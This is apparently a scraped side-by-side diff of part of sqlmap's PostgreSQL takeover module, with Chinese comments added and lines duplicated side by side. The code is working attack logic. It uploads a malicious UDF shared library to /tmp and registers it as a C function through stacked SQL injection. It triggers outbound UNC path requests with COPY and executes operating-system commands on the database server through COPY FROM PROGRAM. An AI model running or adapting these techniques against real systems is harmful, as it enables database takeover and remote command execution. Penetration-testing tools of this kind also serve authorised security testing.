else: else:
# The SO can be in any folder where postgres user has # 7. SO 文件可以放在任何 PostgreSQL 用户具有读/写/执行权限的目录
# read/write/execute access is valid
self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt) self.udfRemoteFile = "/tmp/%s.%s" % (self.udfSharedLibName, self.udfSharedLibExt)
# 8. 设置本地 UDF 文件路径
def udfSetLocalPaths(self): def udfSetLocalPaths(self):
# 9. 设置 UDF 本地文件路径和共享库名称
self.udfLocalFile = paths.SQLMAP_UDF_PATH self.udfLocalFile = paths.SQLMAP_UDF_PATH
self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
# 10. 从 Banner 信息中获取数据库版本
self.getVersionFromBanner() self.getVersionFromBanner()
banVer = kb.bannerFp["dbmsVersion"] banVer = kb.bannerFp["dbmsVersion"]
# 11. 如果没有数据库版本信息,或者版本号不是数字开头,则抛出异常
if not banVer or not banVer[0].isdigit(): if not banVer or not banVer[0].isdigit():
errMsg = "unsupported feature on unknown version of PostgreSQL" errMsg = "unsupported feature on unknown version of PostgreSQL"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 12. 如果数据库版本大于等于 10则取主版本号
elif LooseVersion(banVer) >= LooseVersion("10"): elif LooseVersion(banVer) >= LooseVersion("10"):
majorVer = banVer.split('.')[0] majorVer = banVer.split('.')[0]
# 13. 如果数据库版本大于等于 8.2,则取主版本号和小版本号
elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer: elif LooseVersion(banVer) >= LooseVersion("8.2") and '.' in banVer:
majorVer = '.'.join(banVer.split('.')[:2]) majorVer = '.'.join(banVer.split('.')[:2])
# 14. 如果数据库版本小于 8.2,则抛出异常
else: else:
errMsg = "unsupported feature on versions of PostgreSQL before 8.2" errMsg = "unsupported feature on versions of PostgreSQL before 8.2"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 15. 尝试获取 UDF 文件
try: try:
# 16. 如果是 Windows 系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS):
_ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_") _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_")
checkFile(_) checkFile(_)
self.udfLocalFile = decloakToTemp(_) self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "dll" self.udfSharedLibExt = "dll"
# 17. 如果是 Linux 系统
else: else:
_ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_") _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_")
checkFile(_) checkFile(_)
self.udfLocalFile = decloakToTemp(_) self.udfLocalFile = decloakToTemp(_)
self.udfSharedLibExt = "so" self.udfSharedLibExt = "so"
# 18. 如果找不到 UDF 文件,则抛出异常
except SqlmapSystemException: except SqlmapSystemException:
errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch()) errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch())
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 19. 从共享库创建 UDF
def udfCreateFromSharedLib(self, udf, inpRet): def udfCreateFromSharedLib(self, udf, inpRet):
# 20. 如果需要创建 UDF
if udf in self.udfToCreate: if udf in self.udfToCreate:
logger.info("creating UDF '%s' from the binary UDF file" % udf) logger.info("creating UDF '%s' from the binary UDF file" % udf)
inp = ", ".join(i for i in inpRet["input"]) inp = ", ".join(i for i in inpRet["input"])
ret = inpRet["return"] ret = inpRet["return"]
# 21. 创建 UDF 的 SQL 语句
# Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html
inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp)) inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp))
inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf)) inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf))
self.createdUdf.add(udf) self.createdUdf.add(udf)
# 22. 如果不需要创建 UDF
else: else:
logger.debug("keeping existing UDF '%s' as requested" % udf) logger.debug("keeping existing UDF '%s' as requested" % udf)
# 23. 发送 UNC 路径请求
def uncPathRequest(self): def uncPathRequest(self):
# 24. 创建支持表
self.createSupportTbl(self.fileTblName, self.tblField, "text") self.createSupportTbl(self.fileTblName, self.tblField, "text")
# 25. 执行 COPY 命令,发送 UNC 路径请求
inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True)
# 26. 清理支持表
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True)
# 27. 执行系统命令,并返回输出
def copyExecCmd(self, cmd): def copyExecCmd(self, cmd):
output = None output = None
# 28. 如果支持堆叠查询
if isStackingAvailable(): if isStackingAvailable():
# Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
@ -109,21 +123,17 @@ class Takeover(GenericTakeover):
query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
output = inject.getValue(query, resumeValue=False) output = inject.getValue(query, resumeValue=False)
if isListLike(output): if isListLike(output):
output = flattenValue(output) output = flattenValue(output)
output = filterNone(output) output = filterNone(output)
if not isNoneValue(output): if not isNoneValue(output):
output = os.linesep.join(output) output = os.linesep.join(output)
self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
inject.goStacked(self._cleanupCmd) inject.goStacked(self._cleanupCmd)
return output return output
# 29. 检查是否支持 COPY 命令执行系统命令
def checkCopyExec(self): def checkCopyExec(self):
if kb.copyExecTest is None: if kb.copyExecTest is None:
kb.copyExecTest = self.copyExecCmd("echo 1") == '1' kb.copyExecTest = self.copyExecCmd("echo 1") == '1'
return kb.copyExecTest
return kb.copyExecTest
Loading…
Cancel
Save